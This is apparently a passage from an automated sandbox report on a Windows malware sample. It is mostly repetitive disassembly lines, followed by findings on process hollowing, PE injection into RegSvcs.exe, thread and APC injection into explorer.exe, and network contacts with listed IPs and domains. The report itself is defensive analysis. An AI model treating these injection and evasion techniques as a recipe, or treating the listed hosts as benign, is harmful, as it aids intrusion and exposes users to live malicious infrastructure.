Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181AC7B mov eax, dword ptr fs:[00000030h] 6_2_0181AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181AC7B mov eax, dword ptr fs:[00000030h] 6_2_0181AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181AC7B mov eax, dword ptr fs:[00000030h] 6_2_0181AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181AC7B mov eax, dword ptr fs:[00000030h] 6_2_0181AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181AC7B mov eax, dword ptr fs:[00000030h] 6_2_0181AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181AC7B mov eax, dword ptr fs:[00000030h] 6_2_0181AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181AC7B mov eax, dword ptr fs:[00000030h] 6_2_0181AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181AC7B mov eax, dword ptr fs:[00000030h] 6_2_0181AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181AC7B mov eax, dword ptr fs:[00000030h] 6_2_0181AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181AC7B mov eax, dword ptr fs:[00000030h] 6_2_0181AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181AC7B mov eax, dword ptr fs:[00000030h] 6_2_0181AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01867794 mov eax, dword ptr fs:[00000030h] 6_2_01867794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01867794 mov eax, dword ptr fs:[00000030h] 6_2_01867794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01867794 mov eax, dword ptr fs:[00000030h] 6_2_01867794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017FFF60 mov eax, dword ptr fs:[00000030h] 6_2_017FFF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017FEF40 mov eax, dword ptr fs:[00000030h] 6_2_017FEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E4F2E mov eax, dword ptr fs:[00000030h] 6_2_017E4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E4F2E mov eax, dword ptr fs:[00000030h] 6_2_017E4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018237F5 mov eax, dword ptr fs:[00000030h] 6_2_018237F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B070D mov eax, dword ptr fs:[00000030h] 6_2_018B070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B070D mov eax, dword ptr fs:[00000030h] 6_2_018B070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181A70E mov eax, dword ptr fs:[00000030h] 6_2_0181A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181A70E mov eax, dword ptr fs:[00000030h] 6_2_0181A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180F716 mov eax, dword ptr fs:[00000030h] 6_2_0180F716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0187FF10 mov eax, dword ptr fs:[00000030h] 6_2_0187FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0187FF10 mov eax, dword ptr fs:[00000030h] 6_2_0187FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181E730 mov eax, dword ptr fs:[00000030h] 6_2_0181E730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B73D mov eax, dword ptr fs:[00000030h] 6_2_0180B73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B73D mov eax, dword ptr fs:[00000030h] 6_2_0180B73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B8F6A mov eax, dword ptr fs:[00000030h] 6_2_018B8F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F8794 mov eax, dword ptr fs:[00000030h] 6_2_017F8794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0187FE87 mov eax, dword ptr fs:[00000030h] 6_2_0187FE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F766D mov eax, dword ptr fs:[00000030h] 6_2_017F766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018646A7 mov eax, dword ptr fs:[00000030h] 6_2_018646A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B0EA5 mov eax, dword ptr fs:[00000030h] 6_2_018B0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B0EA5 mov eax, dword ptr fs:[00000030h] 6_2_018B0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B0EA5 mov eax, dword ptr fs:[00000030h] 6_2_018B0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F7E41 mov eax, dword ptr fs:[00000030h] 6_2_017F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F7E41 mov eax, dword ptr fs:[00000030h] 6_2_017F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F7E41 mov eax, dword ptr fs:[00000030h] 6_2_017F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F7E41 mov eax, dword ptr fs:[00000030h] 6_2_017F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F7E41 mov eax, dword ptr fs:[00000030h] 6_2_017F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F7E41 mov eax, dword ptr fs:[00000030h] 6_2_017F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01828EC7 mov eax, dword ptr fs:[00000030h] 6_2_01828EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0189FEC0 mov eax, dword ptr fs:[00000030h] 6_2_0189FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018136CC mov eax, dword ptr fs:[00000030h] 6_2_018136CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B8ED6 mov eax, dword ptr fs:[00000030h] 6_2_018B8ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EE620 mov eax, dword ptr fs:[00000030h] 6_2_017EE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018116E0 mov ecx, dword ptr fs:[00000030h] 6_2_018116E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EC600 mov eax, dword ptr fs:[00000030h] 6_2_017EC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EC600 mov eax, dword ptr fs:[00000030h] 6_2_017EC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EC600 mov eax, dword ptr fs:[00000030h] 6_2_017EC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01818E00 mov eax, dword ptr fs:[00000030h] 6_2_01818E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1608 mov eax, dword ptr fs:[00000030h] 6_2_018A1608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F76E2 mov eax, dword ptr fs:[00000030h] 6_2_017F76E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181A61C mov eax, dword ptr fs:[00000030h] 6_2_0181A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181A61C mov eax, dword ptr fs:[00000030h] 6_2_0181A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0189FE3F mov eax, dword ptr fs:[00000030h] 6_2_0189FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018AAE44 mov eax, dword ptr fs:[00000030h] 6_2_018AAE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018AAE44 mov eax, dword ptr fs:[00000030h] 6_2_018AAE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180AE73 mov eax, dword ptr fs:[00000030h] 6_2_0180AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180AE73 mov eax, dword ptr fs:[00000030h] 6_2_0180AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180AE73 mov eax, dword ptr fs:[00000030h] 6_2_0180AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180AE73 mov eax, dword ptr fs:[00000030h] 6_2_0180AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180AE73 mov eax, dword ptr fs:[00000030h] 6_2_0180AE73
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034B8B58 mov eax, dword ptr fs:[00000030h] 9_2_034B8B58
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03413B7A mov eax, dword ptr fs:[00000030h] 9_2_03413B7A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03413B7A mov eax, dword ptr fs:[00000030h] 9_2_03413B7A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A131B mov eax, dword ptr fs:[00000030h] 9_2_034A131B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033EDB60 mov ecx, dword ptr fs:[00000030h] 9_2_033EDB60
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033EF358 mov eax, dword ptr fs:[00000030h] 9_2_033EF358
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033EDB40 mov eax, dword ptr fs:[00000030h] 9_2_033EDB40
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034153C5 mov eax, dword ptr fs:[00000030h] 9_2_034153C5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034653CA mov eax, dword ptr fs:[00000030h] 9_2_034653CA
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034653CA mov eax, dword ptr fs:[00000030h] 9_2_034653CA
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034103E2 mov eax, dword ptr fs:[00000030h] 9_2_034103E2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034103E2 mov eax, dword ptr fs:[00000030h] 9_2_034103E2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034103E2 mov eax, dword ptr fs:[00000030h] 9_2_034103E2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034103E2 mov eax, dword ptr fs:[00000030h] 9_2_034103E2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034103E2 mov eax, dword ptr fs:[00000030h] 9_2_034103E2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034103E2 mov eax, dword ptr fs:[00000030h] 9_2_034103E2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340DBE9 mov eax, dword ptr fs:[00000030h] 9_2_0340DBE9
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034923E3 mov ecx, dword ptr fs:[00000030h] 9_2_034923E3
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034923E3 mov ecx, dword ptr fs:[00000030h] 9_2_034923E3
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034923E3 mov eax, dword ptr fs:[00000030h] 9_2_034923E3
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033F1B8F mov eax, dword ptr fs:[00000030h] 9_2_033F1B8F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033F1B8F mov eax, dword ptr fs:[00000030h] 9_2_033F1B8F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A138A mov eax, dword ptr fs:[00000030h] 9_2_034A138A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0349D380 mov ecx, dword ptr fs:[00000030h] 9_2_0349D380
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0341138B mov eax, dword ptr fs:[00000030h] 9_2_0341138B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0341138B mov eax, dword ptr fs:[00000030h] 9_2_0341138B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0341138B mov eax, dword ptr fs:[00000030h] 9_2_0341138B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0341B390 mov eax, dword ptr fs:[00000030h] 9_2_0341B390
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03412397 mov eax, dword ptr fs:[00000030h] 9_2_03412397
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340EB9A mov eax, dword ptr fs:[00000030h] 9_2_0340EB9A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340EB9A mov eax, dword ptr fs:[00000030h] 9_2_0340EB9A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03414BAD mov eax, dword ptr fs:[00000030h] 9_2_03414BAD
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03414BAD mov eax, dword ptr fs:[00000030h] 9_2_03414BAD
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03414BAD mov eax, dword ptr fs:[00000030h] 9_2_03414BAD
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034B5BA5 mov eax, dword ptr fs:[00000030h] 9_2_034B5BA5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03474257 mov eax, dword ptr fs:[00000030h] 9_2_03474257
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034AEA55 mov eax, dword ptr fs:[00000030h] 9_2_034AEA55
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033EAA16 mov eax, dword ptr fs:[00000030h] 9_2_033EAA16
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033EAA16 mov eax, dword ptr fs:[00000030h] 9_2_033EAA16
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0349B260 mov eax, dword ptr fs:[00000030h] 9_2_0349B260
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0349B260 mov eax, dword ptr fs:[00000030h] 9_2_0349B260
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034B8A62 mov eax, dword ptr fs:[00000030h] 9_2_034B8A62
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E5210 mov eax, dword ptr fs:[00000030h] 9_2_033E5210
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E5210 mov ecx, dword ptr fs:[00000030h] 9_2_033E5210
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E5210 mov eax, dword ptr fs:[00000030h] 9_2_033E5210
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E5210 mov eax, dword ptr fs:[00000030h] 9_2_033E5210
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033F8A0A mov eax, dword ptr fs:[00000030h] 9_2_033F8A0A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0342927A mov eax, dword ptr fs:[00000030h] 9_2_0342927A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03403A1C mov eax, dword ptr fs:[00000030h] 9_2_03403A1C
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034AAA16 mov eax, dword ptr fs:[00000030h] 9_2_034AAA16
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034AAA16 mov eax, dword ptr fs:[00000030h] 9_2_034AAA16
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A229 mov eax, dword ptr fs:[00000030h] 9_2_0340A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A229 mov eax, dword ptr fs:[00000030h] 9_2_0340A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A229 mov eax, dword ptr fs:[00000030h] 9_2_0340A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A229 mov eax, dword ptr fs:[00000030h] 9_2_0340A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A229 mov eax, dword ptr fs:[00000030h] 9_2_0340A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A229 mov eax, dword ptr fs:[00000030h] 9_2_0340A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A229 mov eax, dword ptr fs:[00000030h] 9_2_0340A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A229 mov eax, dword ptr fs:[00000030h] 9_2_0340A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A229 mov eax, dword ptr fs:[00000030h] 9_2_0340A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03424A2C mov eax, dword ptr fs:[00000030h] 9_2_03424A2C
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03424A2C mov eax, dword ptr fs:[00000030h] 9_2_03424A2C
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340B236 mov eax, dword ptr fs:[00000030h] 9_2_0340B236
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340B236 mov eax, dword ptr fs:[00000030h] 9_2_0340B236
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340B236 mov eax, dword ptr fs:[00000030h] 9_2_0340B236
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340B236 mov eax, dword ptr fs:[00000030h] 9_2_0340B236
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340B236 mov eax, dword ptr fs:[00000030h] 9_2_0340B236
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340B236 mov eax, dword ptr fs:[00000030h] 9_2_0340B236
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E9240 mov eax, dword ptr fs:[00000030h] 9_2_033E9240
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E9240 mov eax, dword ptr fs:[00000030h] 9_2_033E9240
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E9240 mov eax, dword ptr fs:[00000030h] 9_2_033E9240
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E9240 mov eax, dword ptr fs:[00000030h] 9_2_033E9240
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03412ACB mov eax, dword ptr fs:[00000030h] 9_2_03412ACB
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033FAAB0 mov eax, dword ptr fs:[00000030h] 9_2_033FAAB0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033FAAB0 mov eax, dword ptr fs:[00000030h] 9_2_033FAAB0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E52A5 mov eax, dword ptr fs:[00000030h] 9_2_033E52A5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E52A5 mov eax, dword ptr fs:[00000030h] 9_2_033E52A5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E52A5 mov eax, dword ptr fs:[00000030h] 9_2_033E52A5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E52A5 mov eax, dword ptr fs:[00000030h] 9_2_033E52A5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E52A5 mov eax, dword ptr fs:[00000030h] 9_2_033E52A5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03412AE4 mov eax, dword ptr fs:[00000030h] 9_2_03412AE4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Enables debug privileges
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\ipconfig.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 154.203.184.76 80
Source: C:\Windows\explorer.exe Domain query: www.realsults.com
Source: C:\Windows\explorer.exe Network Connect: 172.67.148.14 80
Source: C:\Windows\explorer.exe Domain query: www.wfiboostrs.com
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\ipconfig.exe Thread register set: target process: 3424
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 8B0000
Writes to foreign memory regions
